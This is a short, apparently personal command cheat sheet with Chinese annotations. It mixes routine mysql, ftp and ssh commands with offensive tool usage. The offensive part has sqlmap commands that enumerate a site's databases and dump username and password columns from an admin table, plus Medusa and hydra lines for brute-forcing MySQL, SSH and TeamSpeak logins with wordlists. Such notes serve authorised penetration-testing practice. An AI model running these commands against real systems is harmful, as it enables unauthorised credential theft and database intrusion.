service mysql restart
mysql -u root -p
ftp 10.18.34.115
anonymous
cd /rose
get /rose/1.bmp 1.bmp
put 1.bmp /rose/333.bmp
mput local-files
bye
telnet 192.168.120.204
vim /etc/ssh/sshd_config
ssh root@172.25.0.10
sqlmap
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs
查询有哪些数据库
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables
查询test数据库中有哪些表
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –
columns
查询test数据库中admin表有哪些字段
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C
“username,password” –dump
dump出字段username与password中的数据
暴力破解
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module
[OPT]
Medusa [-h 主机| -H 文件] [-u 用户名| -U 文件] [-p 密码| -P 文件] [-C 文件] -M 模块[OPT]
hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT
192.168.137.133 mysql
hydra -L user.txt -P pass.txt -t 2 -vV -e ns 192.168.124.10 ssh
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
https://blog.csdn.net/alex_seo/article/details/89304827 常用脚本